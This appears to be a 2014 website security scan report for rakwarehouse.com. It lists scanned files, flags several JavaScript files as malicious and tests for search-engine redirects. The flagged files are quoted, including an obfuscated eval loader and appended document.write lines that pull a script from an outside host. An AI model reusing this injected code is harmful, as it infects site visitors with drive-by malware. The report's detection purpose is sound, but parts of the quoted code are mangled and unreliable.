Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rakwarehouse.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rakwarehouse.com/ | 200 OK Content-Length: 14937 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://rakwarehouse.com/jqueryslidemenu.js | 200 OK Content-Length: 2549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#" menuid ">ul") var $headers=$mainmenu.find("ul").parent() $headers.each(function(i){ var $curobj=$(this) var $subul=$(this).find('ul:eq(0)') this._dimensions={w:t }, function(e){ var $targetul=$(this).children("ul:eq(0)") $targetul.slideUp(jqueryslidemenu.animateduration.out) } ) $curobj.click(function(){ $(this).children("ul:eq(0)").hide() }) }) $mainmenu.find("ul").css({display:'none', visibility:'visible'}) }) } } jqueryslidemenu.buildmenu("myslidemenu", arrowimages) Antivirus reports:
| ||
http://rakwarehouse.com/js/jquery-1.4.min.js | 200 OK Content-Length: 625 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) q5bZq20Zq4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq58Zq70Zq6fZq6bZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[xlzpj]("Zq");}phycx=hzqijk;dujf=[];for(yqng=22-20-2;-yqng 1456!=0;yqng =1){vdzs=yqng;if((0x19==031))dujf =ckiqh.fromCharCode(eval(sulc phycx[1*vdzs]) 0xa-acgbwb);}hga=eval;if(Math.ceil(5.5)===6)hga(dujf)} /*/a9a007*/ Antivirus reports:
| ||
http://rakwarehouse.com/js/loopedslider.js | 200 OK Content-Length: 9212 Content-Type: application/javascript | malicious |
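Malicious code - confirmed by antiviruses (see below): document.write(''); if(typeof jQuery != 'undefined') { jQuery(function($) { $.fn.extend({ loopedSlider: function(options) { var settings = $.extend({}, $.fn.loopedSlider.defaults, options); return this.each( function() { if($.fn.jquery < '1.3.2') {return;} var $t = $(this); var o = $.metadata ? $.extend({}, settings, $t.metadata()) : settings; var distance = 0; var times = 1; break; } }; } ); } }); $.fn.loopedSlider.defaults = { container: ".container", slides: ".slides", pagination: "pagination", containerClick: true, autoStart: 0, restart: 0, slidespeed: 300, fadespeed: 200, autoHeight: 0, addPagination: false }; }); } document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Note: the listing above is abridged. The part that stands out is the final document.write call, which pulls in a script from a third-party host (slawex781.home.pl); the code before it appears to be the ordinary loopedSlider plugin. The same appended line closes the jquery.tabs.pack.js excerpt below, so cleanup should compare every script on the site against a known-good copy, not only the files listed in this report. Antivirus reports: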
| ||
http://rakwarehouse.com/js/jquery.tabs.pack.js | 200 OK Content-Length: 5875 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('(4($){$.2l({z:{2k:0}});$.1P.z=4(x,w){3(O x==\'2Y\')w=x;w=$.2l({K:(x&&O x==\'1Z\'&&x>0)?--x:0,12:C,J:$.1f?2h:T,18:T,1r:\'2X&am document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://rakwarehouse.com/index.html | 200 OK Content-Length: 14937 Content-Type: text/html | clean |
http://rakwarehouse.com/aboutus.html | 200 OK Content-Length: 9512 Content-Type: text/html | clean |
http://rakwarehouse.com/vision.html | 200 OK Content-Length: 10924 Content-Type: text/html | clean |
http://rakwarehouse.com/location.pdf | 200 OK Content-Length: 300915 Content-Type: application/pdf | clean |
http://rakwarehouse.com/test404page.js | 404 Not Found Content-Length: 413 Content-Type: text/html | clean |
http://rakwarehouse.com/faq.html | 200 OK Content-Length: 13164 Content-Type: text/html | clean |
http://rakwarehouse.com/advrakwl.html | 200 OK Content-Length: 19464 Content-Type: text/html | clean |
http://rakwarehouse.com/rakia.html | 200 OK Content-Length: 13595 Content-Type: text/html | clean |
http://rakwarehouse.com/tech.html | 200 OK Content-Length: 12105 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rakwarehouse.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:20:28 GMT
Accept-Ranges: bytes
ETag: "1fc141b-3a59-4ffb7453d6cae"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 14937
Content-Type: text/html
Last-Modified: Sun, 03 Aug 2014 10:41:52 GMT
...14937 bytes of data.
GET / HTTP/1.1
Host: rakwarehouse.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:20:28 GMT
Accept-Ranges: bytes
ETag: "1fc141b-3a59-4ffb7453d6cae"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 14937
Content-Type: text/html
Last-Modified: Sun, 03 Aug 2014 10:41:52 GMT
...14937 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rakwarehouse.com
Referer: http://www.google.com/search?q=rakwarehouse.com
Result:
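The result is similar to the first query. There are no suspicious redirects found. Note that this check differs from the first query only in its Referer header; a redirect that depends on other request properties (for example User-Agent, client IP address or cookies) would not show up in it.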
GET / HTTP/1.1
Host: rakwarehouse.com
Referer: http://www.google.com/search?q=rakwarehouse.com
Result:
The result is similar to the first query. There are no suspicious redirects found.